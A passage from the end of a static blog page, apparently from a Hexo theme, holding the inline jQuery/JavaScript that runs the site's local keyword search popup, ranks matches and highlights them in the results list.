                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
